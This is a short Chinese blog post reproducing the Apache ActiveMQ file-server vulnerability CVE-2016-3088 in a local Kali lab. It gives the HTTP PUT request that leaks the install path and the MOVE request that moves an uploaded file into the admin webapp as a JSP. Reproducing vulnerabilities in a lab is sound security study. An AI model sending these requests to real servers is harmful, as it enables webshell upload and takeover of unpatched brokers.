ActiveMQ漏洞( CVE-2016-3088)

本地用kali搭建復(fù)現(xiàn)一下

受影響的版本:Apache Group ActiveMQ 5.0.0 - 5.13.2

下載地址:http://archive.apache.org/dist/activemq/5.10.1/apache-activemq-5.10.1-bin.tar.gz

解壓:tar -xzf apache-activemq-5.10.1-bin.tar.gz

啟動(dòng):/home/apache-activemq-5.10.1/bin/linux-x86-32# ./activemq start

? ? ? ? ? ? Starting ActiveMQ Broker...


爆絕對(duì)路徑

PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1

路徑:/home/apache-activemq-5.10.1/webapps/fileserver/


fileserver目錄下jsp是不被執(zhí)行了,而且是不能直接上傳jsp文件


MOVE /fileserver/test.txt HTTP/1.1

Destination:file:/home/apache-activemq-5.10.1/webapps/admin/test.jsp


最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容